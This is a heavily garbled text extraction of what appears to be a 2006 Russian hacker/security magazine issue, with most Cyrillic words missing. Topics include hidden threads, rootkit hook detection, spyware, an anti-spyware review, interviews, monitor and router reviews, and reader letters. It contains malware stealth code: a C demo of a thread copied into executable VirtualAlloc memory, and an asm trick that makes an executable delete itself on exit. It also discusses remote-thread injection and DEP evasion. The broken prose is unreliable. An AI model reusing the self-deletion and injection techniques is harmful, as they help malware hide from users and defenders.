(, GetThreadContext), , CreateThread, EIP . NT, 32-
Windows.
?
, , ,
.
, . !
. , ,
.
.
! , . ?! ,
SHLWAPI.DLL, RPCRT4.DLL OLE32.DLL, , .

( , API).
- ,
.
, 3- .
-

65

( .code .text),
, , VirtualAllocEx. ,
. Softice ,
OllyDbg PE-TOOLS.
OllyDbg file attach
, .
view  memory <ALT-M>.
.
, Priv ( private), , map ( mapping)
, CreateFileMapping/MapViewOfFile, Imag (
imaging) .
PE-TOOLS

dump region,
OllyDbg, .
, .

( ),
#include <stdio.h>
#include <windows.h>
// , ,

thread(){while(1);}
main()
{
void *p;
//

//
CreateThread(0,0,(void*)&thread,
0x999,0,&p);
// ,
malware:
// ,

// CreateThread
p = VirtualAlloc(0, 0x1000, MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
memcpy(p,thread,0x1000);CreateThread
(0,0,p,0x666,0,&p);
// ENTER
gets(&p);
}

, , soft-ice, THREAD -x ( )
( 1).
Soft-ice ,
KERNEL32.DLL. , Process Explorer ,
Microsoft (
Windows NT Internals). ( )
Process Explorer, ,
va_thread.exe ( ), Properties Threads.
? . : va_thread.exe+0x1405,
, ( , hiew'). : va_thread.exe+0x1000 (, -, hiew'), KERNEL32.DLL+0xB700 (
), !
OllyDbg
,
.
va_thread.exe, view
thread ... ( ), ( 2)!
(entry)
50Ch, , , OllyDbg.

, ...
c 558h (,

) ,
( )
, , .
( 3).
,
. , ( ,
999h),
(
401000h), ( , ,
,

, ).
55Ch.
, ( ), ( 4).
666h , , 520000h , ( )
, VirtualAlloc
( 5).
578h, , (!)
( 6).
, ,
. ,
, . OllyDbg Follow in Disassembler ( ) , , .
, . . ,
(
- , ).

PUSH EBP/MOV EBP, ESP
(55h/8Bh ECh), jump , , , jump,
, jump .
, , .
,
. 100%,
. , , , backdoor, .
, () , , (DELPHI, Visual BASIC).


, ,

66 09- 06

, , , , .
SST.
, , NtQuerySystemInformation.
NTDDLL.DLL ,
,
INT 2Eh (NT, W2K),
SYSENTER (XP ) ( 7).
, (ring 3) (ring 0), KiSystemService, NTOSKRNL.EXE
( SDT
System Descriptor Table). , win32k.sys, .
IIS, .
, , System Service Table (
),
,
(,
,
, PhysicalMemory). . NTOSKRNL.EXE

SDT Restore

LoadLibrary ,
, KeServiceDescriptorTable
GetProcAddress ( ). SST,

: addr ==
*(DWORD *)(KeServiceDescriptorTable[0] + N*sizeof(DWORD)). N , addr
( 8).
SST softice, NTCALL.
NTOSKRNL.EXE, , - . ,
-
, , .
SST
, NTOSKRNL.EXE, , ,
.
,
http://msdl.microsoft.com/download/symbols dbghelp.dll,
Debugging Tools. SST _KiServiceTable ( 9).
? KeServiceDescriptorTable ( , x86,
). mov
[mem], imm32 SST (imm32), KeServiceDescriptorTable[0]. , SDT KiInitSystem ( 10).
SST ,

Win2K/XP SDT Restore Tan Chew Keong.
SDT Restore, , rootkit', . -, SST
SDT Restore , , KeServiceDescriptorTable[0],
( http://hi-tech.nsys.by/35/). -, SST PhysicalMemory, native-API NtMapViewOfSection, -

, .
, NtMapViewOfSection
PhysicalMemory. , , , ( www.rootkit.com/newsread.php?newsid=200).
, , IDT, , , .
IDT ( soft-ice)
NTOSKRNL.EXE HAL.DLL ( 11).
, ( !)
jump , SST/IDT.

NTOSKRNL.EXE,
PETOOLS eXtreme Dumper
soft-ice ( )
IceExt IceDump.
.
,
,
(
IE NT). - , ,
, crack', ,
. IE
Lynx, , NT
, ,
. , - .
, , , soft-ice

www.runtime.org/gdbnt.zip
ntexplorer
www.ollydbg.de
ollydbg
www.sysinternals.com/utilities/processexplorer.html
process explorer
http ://stenri.pisem.net
iceext
http://programmerstools.org/system/files?file=icedump6.026.zip
icedum
www.wasm.ru/baixado.php?mode=tool&id=124
pe-tools (base)
http://neox.iatp.by
pe-tools (updates)
http://neox.iatp.by/extremedumper.zip
extremedumper
www.security.org.sg/code/sdtrestore.html
sdt restore

15% ,

,


1 .
2 .
3
:
: subscribe@glc.ru;
: (495) 780-88-24;
: 119021, , . , . 11, . 44-45,
, .
!
.
, ,
5 .
,
20 .
.
,
. ,
, .

: - (495) 500-00-60 www.interpochta.ru
,
, , ,
.



+ CD

6
12
900 . 00 .
1740 . 00 .


+
+

6
12
2550 . 00 .
5040 . 00 .
:
+ CD
+ +


200 .


( . )
*
( )

...

:

/
(
)
e-mail

* .

.

, ,
: 8(495)780-88-29 ( )
8(800)200-3-999 ( , ,
).
: info@glc.ru

68 09- 06


...

, ,
, SPYWARE,
,
DEEONI$
deeonis@gmail.com, icq: 982-622

Spyware adware
. ,
, .


. ,
.
,
.
,
, , .
antispyware.
,
aspyware, ,
.
, , , , C++ Delphi,


spyware. , ,
, -

, ,
.
spyware. ,
aspyware . , , !
. ,
, . ,
(- )
. , , ,
,
, , ..

, ,
. : exe, dll. spyware, ,

. ,
Run. , dll explorer.exe.
spyware adware COM-. ,
, COM- GUID. GUID (Globally Unique Identifier)
, ,
. GUID HKCR\AppID. .
spyware (
,
).
, BHO

69

(Browser Helper Object ( )).


,
spyware.
,
. ,
, , ,
,
.. ,
, spyware
. , . , .
, , spyware , .
,
, ,
.
,
, .
,
. ,

:
icq- Miranda
.
. ,
.

. , ,

,
, ..
, . , ,
spyware...
:
spyware . . , , , -

. , ,
-
. spyware ,
. , ,
. ,
, spyware,
.
, .
, ,

spyware
. : ?. ,
spyware, ,
. ...
.
, , 1: . -

Microsoft spyware

$150k

.
, IE, 150000$ . , .
, , . -.
, ,
. - , ,
,
,
29,99$, . , ,
, ,
. -:
.

, ,
, , - .
? , ,
.
, , ,
,
.
, ,
.
. ,
, ;).
. , , ,
, spyware
. ,

.

,
. .
, ,
,
. , -

70 09- 06

. , , , .
. , . , . , ... ! spyware ,
.

. ,
,
. , :
, . , ,
, , . .
, , . - ,
. ,
, , , .
, .
,
, , . ,
Tip of Day,
(
), , . baloon,
, .
spyware,
,
. , ,
.
,
spyware, .
, . ,
, ,
. ,
.
,
-

. :

.
, .

. 90% : ,
.
, ,
,


,
AVZ
,
SPYWARE?

spyware,
.
:
1
, cookies.
url cookie,
,
(
) spyware . .
antispyware
,
.
2
.

software\gator clsid,

spyware-,
-

.




.
.
3
.

,

,
.

,

,
(
clsid

).
4
, , .
-


,
: ,
..

.

spyware ,

, . ,

hoax-
, , -
.. -,

. hoax-
,
.

71


, , ,

, ,
.
,
,
. , , 6 !!!

30% .
. - ,
, . , . , , ,

.
, .
, spyware , - ,
. ,
.
.
,
?
2 ( ), , ,
.
, ,
: . , ,
.
. ,
,
, . , spyware
, ? : .
.
,
,
.
, , antispyware, .
,
... ,
, -


spyware
, .
,
,
: !...
,
,
, .
SPYWARE.
, , .

,
. , . , ,
.
. ,
, .
, .

,


800 .
, .

, , ...
.

, . (

).
, , , - . ,
. . ,
, , . ,
, , , . ,
,
.
spyware ,
, ,
, ,
.
, spyware , ,
,
2000. ,
( ,
),
adware,
. ,
, , ,
. -
, , .
. , , ,
spyware .
, MSDN. !

. -, , .
, . -,
.

. ,
,
, . ,
, . , .

spyware.

72 09- 06


ANTI-SPY.INFO
,
,
. ANTISPY.INFO

no e-mail

,
, . , .

. () /, ( . wrapper ),
.
crack' (
) - . : . (
) Win32.HLLM.Beagle, Packed.Win32.Klone.g
. . ,

,
.
, ( ), ,
.
,
( )
.
.
-, . , . -, , -
(
,
). -, Packed.Win32.Klone.g, , TrojanDropper.Win32.Agent.arz, ,
.
, , ...
Dr.Web , , , ,
-.
, ! , . AVP ActiveX 8 26 (
), CureIt! Dr.Web ,
, , .
.
. ,

. , -

73

,
.
, DR.WEB.

( ), .
! ,
, soft-ice
.
, .
, , , ,
, , ! , , ?! Windows , .
, DLL .
, ,
,
( , , / . .),
( -
).
,
, , (
). (
) ,
Windows ,
MS-DOS.
, , , Anti-Spy.Info.
. Anti-Spy.Info
www.Anti-Spy.Info,
(
$29) 30 ,
. .
1.6.5, , ASProtect' soft-ice ! , -

//,
ASProtect', soft-ice .
1.1,
soft-ice. Anti-Spy.Info ,
.

, ,
IE,
, ,
potentially dangerous
( ),
harmless (). ! , Anti Spy.Info // , . .
Anti-S
Spy.Info.
, (AntiSpy.Info ), .
. Anti-Spy.Info html-

Anti-Spy.Info

txt-, , , , .
. ,
, ,
. - ,
( Windows ) ? , .
. , Anti-Spy.Info,

wmfhotfix.dll, ( 82%) :

(
);
(
WMFHOTFIX.DLL
,
GUI-,
);
,

,

,
,
;
WINDOWS;

( ?!).

74 09- 06

Anti-Spy.Info

, , ,
. , ...
,
, Anti-Spy.Info ( ASCII), , Copyright
2006 by Ilfak Guilfanov, ighexblog.com http//ww.hexblog.com. , wmf-, IDA Pro . ,
,
. Google it

http://www.neuber.com/antispy/file, .
:
. ,

X-Safe IV , ,

- , . 193 , 4 , 2
2 . 7
, , Windows.
SSSensor.dll, , , (function: record input
Properties, )
, API- UnhookWindowsHookExgSetWindowsHookExA,
, Anti-Spy.Info 82% (
). Google it,
, 678 , ,
. - , Panda, - Bullguard,
VCOM SyGate Personal Firewall. ,
, , SSSensor.dll .
, , , .

, - rootkit' ( ). ,

Comment
,
(

).
(
harmless ).
SSSensor.dll (
Rating
, ).
Anti-Spy.Info . , , . Win32.HLLM.Beagle,
- .
Anti-Spy.Info , Beagle.exe , RAR-, , , 57%. hldrrr.exe,

WINNT\System32
,
(HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\Run), 47% (seems harmless ).
,

, ,
. ! ,
( ) Anti-Spy.Info, ,

, - , .
, Anti-Spy.Info . , , . , , Anti-Spy.Info , .
, Windows , . hldrrr.exe hldrrr.ex_ ,
, ! , -

75

- .
(
, ), Quarantine,
Restore. Delete.
, Anti-Spy.Info .
, -
, Windows ,
Anti-Spy.Info, . , , Windows PE, Barn PE Live CD, AntiSpy.Info, , ... ,
.
Anti-Spy.Info , IE, ,
! IE- Anti-Spy.Info
(
70%), : Fresh
Download Catcher Module, ReGetApi Module, Adobe
Acrobat IE Helper Version X for ActiveX ..
, ,

IE . , 5- ,

, .
:
Fresh Download 4- IE
, 5-
, .
, IE
? ,
Anti-Spy.Info , .
. Anti-Spy.Info ,
(
) ,
. , ,
, , , .
, , ,
( ) , , . ,
, rootkit', .

.
,
. Anti-Spy.Info

,
,
,
.

,

,
,
,

11- .
.

,

.

: ,
,
, ,

-.
, ,
.
:
, .
. - ,
- , .


,
.
,
,
,
, ,
...

. -
, -
. -.
.
,
. ,
, . TV,

10 . ,
100 .

. ,
,
.
company.drweb.com/press/igor+daniloff+cnews+
interview+may+2006

AVP Trojan-Downloader.Win32.Bagle

76 09- 06

,
SPYWARE
//
.
. ?

no e-mail
, , ,
,
. (
stealth- ),
. (
), DELPHI Visual Basic'.
, .

DELPHI Visual
Basic' . , , .
.
, , , , , , ,
- , , ,
.

, .
, ,
. ... !
( )
- , IBM PC .
OneHalf.
VM Ware
-

77

(98, W2K, XP, Server 2003) .


, , .
, ,
: ,
, ,
, . -

,
, --.
, .
,
.

, !
, Pentium-4, 100% Pentium-II/III,
.
. ,
, .

.
, . ( ), ,
(!), ,
, .
. (AVP,
Dr.WEB) ,
, ,
.
,
.
( 10
), , (
Norton' ).

, , . -

( VersionInfo)


. -
. !
, !
Microsoft, ? , . (airplane rule) ,
: , ,
.
. API WINDOWS UNIX.
,
, .

. , , - , -

. ,
WINDOWS,
... .

, . (
),
.
.
, , Windows
( ),
Anti-Spy.Info
.

, Microsoft. - :). , googl'
.
ATI . Matrox ,
:).
Microsoft ,
, , .
. , Windows, ... .
! ,
,
Microsoft Visual Studio
. - ,
.

78 09- 06

.
Windows ,
, ( MS-DOS)
.

,
.
WINNT\System32 FAR',
<CTRL-F8> , , ...
. KERNEL32.DLL (
Windows)
API SetFileTime, - .
SetFileTime,


BOOL SetFileTime
(
HANDLE hFile, // handle to the file
CONST FILETIME *lpCreationTime
// time the file was created
CONST FILETIME *lpLastAccessTime,
// time the file was last accessed
CONST FILETIME *lpLastWriteTime
// time the file was last written
);
. , . NTFS- , API ,
. ,
.
, ! ,
,
, .
.
,

100% , , .
.
. exe ,
,
, ,

. , bat-, (
). Windows 9x/NT, , . 9x
FreeLibrary, NT W2k UnmapViewOfFile. ,
,
. DeleteFile ExitProcess
. ? ,
, .
,
module = GetModuleHandle(0);
GetModuleFileName
(module, buf, MAX_PATH);
if(0x80000000 & GetVersion())
{
// Win9x
fnFreeOrUnmap = FreeLibrary;
}
else
{
// WinNT
fnFreeOrUnmap = UnmapViewOfFile;
CloseHandle((HANDLE)4);
}
__asm
{
lea eax, buf
push 0
push 0
push eax
push ExitProcess
push module
push DeleteFile
push fnFreeOrUnmap
ret
}
. , ret , , fnFreeOrUnmap, , Windows, FreeLibrary, UnmapViewOfFile. ,
: , DeleteFile , module
. ,

(
DeleteFile)
4 ( ).
, DeleteFile
: , ExitProcess , push eax
, ! ,
,
.
( ) ExitProcess, , .
! bat (,
, ). - ( ),
UnmapViewOfFile
exe-? NT W2K , - ( PE-) UnmapViewOfFile . XP,
, UnmapViewOfFile, .
,
, . , ,
, .
. ,
, , , Process
Explorer (OlyDbg, soft-ice). , ,
, 99% VirtualAlloc/VirtualAllocEx,
,
DLL.
-
, DLL, Windows ( - )
LoadLibrary.
, , LoadLibrary,
LoadLibraryEx

79

. ,
DLL, - .

VirtualAllocEx. ,
CreateRemoteThread, , GetThreadContext
EIP.
, LoadLibrary DLL,
CreateThread, , , VirtualAllocEx, , CreateRemoteThread ( EIP ).
,
TerminateThread, , ...
, ( ).
, DEP, . !

. , 64- Windows
, API-
(,
64- , 32- , ).
, DEP. VirtualAllocEx, PAGE_READWRITE,
PAGE_EXECUTE VirtualProtectEx.
DEP PAGE_READ
PAGE_EXECUTE , : ACCESS
( /
) write ( / ). EXECUTE , .
80386
, (, ) . , PAGE_EXECUTE
win32
,
.
DEP
( ), PAGE_EXECUTE .
PAGE_EXECUTE_READWRITE? VirtualProtectEx , -

msblast, ,

. , , Microsoft ,
, .
,
.
? ! . ,
-. VirtualAllocEx
DLL, ,
API- SetTimer,
, ( , ). , .
, . ,
...
.
,
API- GetWindowLong GWL_WNDPROC, ( ) SetWindowLong.
(

, ), , , . , , soft-ice, :
- DLL?
, ,
DELPHI.
.
, .
, , / , ,
/ CALLBACK.
,

,
, CALLBACK-, . ,
,
.
.
, , .

. ,
. . . . ,

I A L

80 SPECIAL DELIVERY 09- 06

( , , , ),
,
, :). ,

,
- .
, !
. ,
,

ADAWARE, SPYBOTA?


c

,
AVZ.

.

: ,
, ADAware.
... ! , . ,
,
.
( , ).
AVZ , LSP, .
AVZ ,

.
AVZ,

. AVZ ,
.
ADAWARE ,


TRACKING COOKIES. ,
, ,
NOT-A-

S P E

VIRUS-MIRC-6.12 :).

, . , ,
, -
, , - ,
-, .
.
,
-, .
, , , . , , - (AVZ).


,
,
SUPER_
SYSTEM_MIRROSOFT_32.EXE,
.
, ?
?

:
. -, ,
,
. -,

.
: ,

81

.
, ...
virusinfo.info , AVZ .
. ,

. AVZ : ,
DLL, .
-
, -,
.
,
EASTER EGG, -
-?
, ?

: , , ,
... : , , ,
,
2-3 -. , .
,
, ,
.
:(.
!
.

: . . :
. , .
- . . ,
, ... AVZ
, , , .

,
?

?

: - AVZ . -

,
,
. AVZ
- -.

. ,
.

,
- - , . , , ,
,
. ,

, .
, ,

,
. .
malware adware/spyware, Downloader, RemoteAdmin
. AVP , .
, -.
,

?

:
IBM PC . ... ,
:
, .

),

,
?

: , .
: ... . , , .... BMP' 2 , ,
.
.
? :).


SPYWARE ANTISPYWARE ?
- .

: spy-, ,
, ... , . ( VBA, http://anti-virus.by/). VBA
malware

,
, , . , , adware

: . , -
, ( IDA), SoftICE .
,
.
C .

Windows ,
. API Windows NT/2000 Windows 2000 . .
.
,
,

.
, :
,

- ?

: :
? :) ,

82 SPECIAL DELIVERY 09- 06

S P E

I A L

www.kaspersky.ru

,


,
,

, .

www.viruslist.com/ru/.

www.viruslist.com/ru/news.
-

www.bugtrack.ru
,


.

,

.
,
, -

:
, ,
,
,
.
,
( , , ),

.
- 20 // .
www.kaspersky.ru/
virusscanner,
.

, ,
.
.
.

83

www.xakep.ru
, bugtrack
.

.
//. ,
2005
(www.xakep.ru/magazine/
xa/078/076/1.asp)
IRC-

www.progz.ru
, , ,
, ,
.
: Windows,
,
-,

UnrealIRCD. , -
:).
2006
(www.xakep.ru/magazine/
xa/089/060/1.asp)

Win32.Mytob.D. ,

,
:).
, .
:
PDF- (
).

,
*nix, , ,
- .

,
,
.
-
, -,
, .


(www.progz.ru/forum/index.php?sh
owforum=42),
3000 .

www.cracklab.ru


, .

,

.
.
// , .

www.hijackthis.de
,
MS ,


hijack.
, ,
..

, , . : IDA
Pro, Quick
Unpack, PEiD, WinUpack
.

, Delphi,
C/C++ PHP. .

HijackThis (http://download.
hijackthis.eu/hijackthis_199.zip)
,
.

hijack, -
. , -
,
.

I A L

84 SPECIAL DELIVERY 09- 06

IT 20 .

,

,

.
Novell/
3com/Bay/Siemens/Cisco/
ISACA.

-
Secproof Oy
(www.secproof.com).

Arhont.com, iPRO.lv.

-
Cisco
Systems. Cisco


.

IT-
.

.


.

: ,
UNIX,
...

.

,
-8
,

.

,

W2K,
FreeBSD 4.5.
,

S P E

, Y2K?

: ,
Microsoft,
. , ,
. , , .
, , web- , . , . , . ,
, . ( , ), . ,
.
:
,

85

, spyware . ( )
, , ,
. .
. , (, -), ,
. - (Apache) - (IE) , ! , , , , , ,
.
.
: , .
. , ,
.
, - . . , -, , , , . . ,
.
: , . Y2K, IT
. Y2K, . , antivirusi/firewall' . ,
, . - (Y2K ) ()
. , , . , ,
, proxy/firewall's.
, , .
OS, , , , , .


,
, , ?

: (,
: , . .),
. , . (
, ) , .
, ? , , . . ? , shell-
. , honeypot' ( , ), . , , , , , , , , .
: , , . , - .
all-in-one. . -. , , , , . .
, , , , . , , ,
. .
: , , security, . -,
, .
, , , . , - .

86 SPECIAL DELIVERY 09- 06

, ,
.
, . , ,
.
: , spyware, . - . ,
. BHODemon, spyware, Browser Helper Objects. , service pack' .. , spyware .
. , . ,
, . spyware.
: Spyware/mailware/virus
. (
), , ,
( ), (tracing). . , ,
, . (anti-spyware/anti-trojans) : ( ) ,
, , .
mailware/adware. , .
. , . ,
. . , , .
MICROSOFT

?

: MS . -, , , , , . , , - : .
. , . MS, , . , -
XP . , , , , . , . MS
. . ...
: Microsoft , ;). , , , , .
: . , . , . , Microsoft'a . .
: . MS MS AntiSpyware, .. MS , , . ( , OneCare), , MS,
. , MS
, - - Microsoft.
.
: MS, , MS . - MS :). ,
MS-

87

.
(IE/Outlook) (data-objects parsing/handling) -. .
,

,

. ?

// ?

: . , , . : , .
, , .
, . ,
, ...
. IT- , . .
: Dr.Web.
. . ,
.
, . . , , ,
.
. .
: . - .
, , - , 100% .
. , ,
, .
: firewall' , . ,
. .
: , , , . ( IE //).
, ,
VM Ware. ,
, . - . ( ),
.
: , , , , . , FreeBSD ( ,
) Mutt, .
: Symantec Antivirus . , , . , .
: -, ,
. Cisco Security Agent.
BHO-spyware BHODemon. , , . , , . , . .
, , ( ).
: Win , antispyware,
firewall ( Outpost Firewall Agnitum), , IE/MS win. application layer firewall - , , . Agnitum FW
- . , web browser'
, IE.
, , , . , , .

88 SPECIAL DELIVERY 09- 06

F A

, ,
, , , , WebMoney, ,
. ,
.
?

X-Dragon,


,

,
,
. ,
: . , -, .
, ,

. ?
.
?
?

,

. , , (). ,
, .
, ++?

: , , , . , . ,
, , . - ,
... .

,
. , ++
, , ,
,
. ++
,

.

?

.
.
,
, -

89

, back-door' ..
, ,
.
Windows. . , /,
(, x8664), ,
, .


?

- ,
. -,

, . -, , ( ),
. -, -
SSE-, . SSE,
8086 (, ,
AAA) , , ,
,
. , ,
, .
,
,
.
?
?

. - .
.
, ,
, ,
. ,
, .
,
, ,
. ...

? .

,
winlogon' ,
( , ). .
, service pack'
, . .
,

?!

. ,
. ,
, . USB-
, . . .
,
. ,
,
. , IDE-, RAID SCSI? ( ) , , . ,
,
.
, .

, , , ,
. , - ,
!
, . ,
. , MS , ,
.


?

. ,
, jump
. , ?
,
jump',
NTOSKRNL.EXE,
. , /, , , . . , ,
, .
, - .

...

. ,
. ,
:
, IDE- Windows XP Professional ! , ( , . .).
, ,
. ,
. ...
?

.
OpenBSD, . ,
, Windows. , ,
,
.
?

,
( )
- .
, - .
, , , ...
,
. ...

hard
lcd20+
- 20

LCD 15 ,
, . ,
, , , , . , , .
.

. TFTtest , .
, , ,
.

. ,

, , .
, (, , ).
, . . : ,
. , . ,
, , (
). : , .
, , , , .

SAMSUNG
SyncMaster 204B
($562) 9

(): 20
: 1600 x1200
: 300 /2
: 800:1
: 5
( /
): 160/160
SUB, DVI-D
D
: D-S
: TCO03
:
: 444x 427.6x 200
: 7.7

. , , ,
:
,
. :

. , , ,
,
. :
, ,
. ,
Samsung SyncMaster 204b .
,
.
.
:
.
,

. ,
,
.

($730) 8

(): 20.1
: 1600 x1200
: 300 /2
: 700:1
: 16
( /
): 178/178
SUB, DVI-D
D
: D-S
: TCO03
:
: 442x 411x 278
: 9.6

. : ,
, , ,
. , , . -

SAMSUNG
SyncMaster 214T
($840) 9

(): 21.3
: 1600 x1200
: 300 /2
: 900:1
: 8
( /
): 178/178
SUB, DVI-D
D
: D-S
: TCO03
:
: 469x 466.2x 228.5
: 8.8

.

CRT-: , ,

.

.
:

. :
,

. RCA S-VIDEO,

: ,
,
,

: . ,
, , .
.
, -

, .
,
. ,
,
, ,

.

ECO Mode: ,
, , (
).
:
.
, Sony SDM-S205F
:

, ,
. . Sony SDMS205F ,
,
. , .
. :

.
.

.
.

91 |

SONY SDM-S205F

92 |

ACER AL2416
($1016) 8

(): 24
: 1920 x1200
: 500 /2
: 1000:1
: 6
( /
): 178/178
SUB
: D-S
: TCO03
:
577 457 221
: 9.1

. ,
.
:
,
. , , . ,

.

, .
.

,
. ,
.
,
, .
,
,
.

($898) 8

(): 20.1
: 1600x1200
: 300 /2
: 1000:1
: 8
( / ): 170/170
SUB, DVI-D
D
: D-S


,
,
. ,
,
.
USB-
.
.

. ,
, ,
,
.
:
.
, -

.

.

93 |

ViewSonic VP2030b

: TCO99
:
: 468x 403x 315
, : 9

.
,

( ).
. :
,
,
. ,

NEC Multisync
20WGX2
($800) 9

(): 24
: 1680 x1050
: 470 /2
: 1600:1
: 6
( / ): 178/178
SUB
: D-S
: TCO03
:
: 471.4x 391.5x 203
: 7

.
:
,

, ,
NEC MiltiSync 20WGX2 . :

,
. -

,
.

. .
USB
,

.

c, .
,

, .
.
,
(

).
,
.
,
.

BENQ FP202W
94 |

($528) 7

(): 20.1
: 1680 x1050
: 300 /2
: 600:1
, : 6
( / ): 170 x170

.
,
, .
( , ),

. -

: , , .

,
.

SUB, DVI-D
D
: D-S
: TCO92
:
: 396.7x 479.6x 169.9
: 5.7

. ,
1680*1050.
:
,
. , ,

.
.
, -

ACER AT2001
($590) 7

(): 20.1
: 800x 600
: 450 /2
: 500:1
: 16
( / ): 160/120
SUB, RCA, S-V
VIDEO, TV,
: D-S
SCART
: TCO03
: 2 x3
: 495.9x 468.2 x198.4
: 7.8

. ,
!

,
RCA, S-VIDEO, SCART.
-, ,
. , .
-

. , ,
. :

. .
.
800x600, ,
ACER AT2001
.
,
: ,
.

. -
. : . , , ,
ACER AT2001 . , .
, , ,
.

NEC MiltiSync 20WGX2, , Samsung SyncMaster 214T

95 |

hard
, !
ZYXEL P-660RU EE

:
: Ethernet, USB 2.0
: ADSL2+
: 24 /
: 220
, telnet
: web-
DHCP:


?
,
? ADSL-
.
, , ,

,
.
Dial-Up
, LAN
ADSL.
ZyXEL, ,
,
,
.
? ( ) .
ADSL2+ ,
,
. , 1
USB, 1 RJ-45 Ethernet .
. USB
.
-

. , ,
, ,
DHCP .

( ).
: IP .
( , , ). , ZyXEL P-660RU EE
, (NAT) .
.
ADSL,
USB-,

, . ZyXEL P-660RU EE ,
,
. ( ), , ,

.
, ,
.

. .
,
-
.
, USB, ( USB-), . ZyXEL P660RU EE ,
,

. ,
, -

.
, ,
.
. ZyXEL
P-660RU EE ,
.

, . ,

ADSL (ASYMMETRIC DIGITAL SUBSCRIBER LINE)




.

(, )
( , ).
ADSL: DOWNLOAD 8 /, UPLOAD 1 /.
ADSL2+: DOWNLOAD 24 /, UPLOAD 2 /.
ADSL,
,
.
ADSL2+
.
Test_lab
ZyXEL Communications Corporation

soft
noname
NNM.RU
D O C @ N N M . R U

Chat Watch v4.4.5


, -
. Chat Watch o
, .
WebMail Spy,
, . Chat Watch . ,
, AOL Instant Messenger, MSN Messenger Yahoo Messenger.
Chat Watch , . , , .
, , .
Chat Watch ( ), .

HDD Regenerator v1.51




.
,
. ,
. bad sector .
, .
FAT, NTFS ,
. - DS.

Sunbelt Network
Security Inspector v1.6.57.0

, 3000
. Network Security Inspector Windows-, IP-,
, Windows, MacOSX, Unix,
Linux .

.

.

,

pdf, xls,
doc, html, xml DB.
$1,495.00,
, :).

McFunSoft Video Convert Master 6.3


, AVI, MPEG,
MPEG 1, MPEG 2, MPEG 4, VCD,
DVD, SVCD, RMVB, RM, WMV,
MOV, DIVX -.
.

,

. :

DVD/VCD/SVCD;
AVI,
DVD, VCD, SVCD, MPEG,
MPEG 1, MPEG 2, MPEG 4,
RM, RMVB, WMV
-;

;

.

Amor SWF to Video


Converter 2.3.8

NeuroSolutions
NeuroDimension, Inc
.
: ( ),
,
,
, .

Secure iNet Factoy


v5.8 for Java
Secure iNet Factory Java
.
SSH
,
FTP, SMTP, POP3,
IMAP, HTTP, Telnet .

, . , , ,
.

php2exe
,
php-

exe-. , ..

, .
, , - , , ,
.
,
exe system32 php5ts.dll.
- , 5.1

5.0,
: 5.0 5.1.
5.0, php5ts.dll 5.1, ,
, , ,
5.1
php5ts.dll 5.0, .

Online Armor v1.1.1.826


spyware, adware,
.. ,
.

97 |

NeuroSolutions v5.03
Developer Edition

Amor SWF to Video Converter


SWF Macromedia Flash AVI, MPEG, VCD, SVCD DVD.
, .
, Amor SWF to Video Converter
SWF MP3 WAV,
JPEG-.

Fresh Diagnose v7.38


Fresh Devices.
Fresh Diagnose .
, , .
Fresh Diagnose
, , , . , Fresh Diagnose .
.

AVG Free
Edition 7.1.405

:
, ,
,
. ,
.
,
. ( Kerio Personal, Zone Alarm Pro
, Windows XP),

- .

PIMone Ver 5.1


Build:2006.7.4.145
PIMone , , ,
, .
,
!

Keyboard Maniac 4.2


, : Keyboard Maniac (KeyMan)
,

,
. .
Genius KB12e KB16e

Media Key.
, , . KeySpy,
.
( Genius KB12e) ( 255 0 128).
: ,
. , , , Windows,
. .

soft
admining
.
, . 2

( S A N P R I H @ M A I L . R U )

,
,
.
,
, .
: .

.

.
( )
. .
.

. . ,
, .
, :

,

.
.
, .

.
,
.


, , , . , ,
, , .

,
-
.

.
- .
,
. , .
. .
. Kaspersky Administration Kit
   Next 
  Next 
Kaspersky
Administration Kit, 

 Next  .
-,
.
LAN  -. . , , ,
,

,

.
, , updater.
 Next.
.
,
.
, . Next. : ,

36 .
, :
,
,
.
,
Next, ,
.
:
, ,
. 
Properties
. :
, , ,
.

.
:


Properties 


.

. ,

, , , ,

. :
, , .
,

SRV.
   . ,
: Next 


5.0 Windows
Workstation   Next 
  ... 
  .
, 
 .
- ,
. Next.
,
,

,

. Next.

. Next. : . N
.

. ,
,
, , .
Next . .
,

, , . . .
,
, ..,

-.
.

,

. ,
.
.
.
:
, ,

99 |

.
SRV.
SRV
.

.
,
.
,
.
,  .
,

12.30.


.
,
,
SRV. ,

.
. , ,
5.0
Windows Workstation voila.

100 |

. ,
. ,
, . ,
, .

,
  .

:   



.
,
,
.
, ,
,

.
:
. Active Directory, IP-.



. , ,
,
.
. .


. , .

.


.
: . , ,
,
, , ,


.

,
.
.
: , , ,
, .
,
Workstation.
Workstation 

, , .
Workstation.
.
Workstation
. .
- ,
.
,

,
. .
,

. , . , ,
.

crew
e-mail
! SPEC@REAL.XAKEP.RU
S K Y W R I T E R

devgena@atnet.ru
JohnDaRippah

, !
DVD?
, , .
.
!
, DVD , ,
, ,
. , -
, ,
, . !
, .

flex-mx@yandex.ru


, .
, , , ,
: .
, .
: ,
. . !
!
! . !
! , ! ,
, , ,
. , ,
, , , .
!!! ! !!!
15 . ,
, . , web-money
, WMZ , ?
! !!!

, !
! - - . ,
.
! ,
,
, ,
.
, .
! . , ,
, !
! ...
(
WebMoney ).

nonamex@list.ru


, !!!
- . ,
.
, .
- ?
!
, !
: -
MPG, - AVI, - WVM - , -.
, , -
EXE! , -
.
, 1.5 , dialup'. ,
? , , :
dialup'! !
,
-. , , ,
, . ,
:-).
. !

artur@moyapochta.ru

magazin

***

, !
magazin ( )!
, ( ). *nix' ! , !
.. X ? (
).
, -!
. ? ,
? , . ... , ?
, ,

Visual Fortran, 2 . - ! .
,
- ,
.NET. Microsoft
. ,
RAD, !
P.S. ,
, , .
, .

shtrenyov@mail.ru

-
!
-, ,
FreeBSD 5.3 release. make.conf, ,
:
cc: aicasm.o: No such file or directory
cc: aicasm_symbol.o: No such file or
directory
cc: aicasm_gram.o: No such file or directory
cc: aicasm.o_macro_gram: No such file
or directory
cc: aicasm.o_scan: No such file or directory
cc: aicasm_macro_scan.o: No such file or
directory
make.conf
CPU_TYPE?=p3
CPU_TYPE=p3
COMPAT4X=true
CFLAGS=-ol -pipe -march=pentium3 mtune=pentium3 NO_CPU_FLAGS=false
NO_CPU_COPTFLAGS=false
MAKE_KERBEROS4=false MAKE_KERBEROS4=false NO_BIND=true
NO_SENDMAIL=true NO_GAMES=true
PERL_VER=5.8.5
PERL_VERSION=5.8.5
PERL_ARCH=mach
NOPERL=no
WITH_PERL=yes
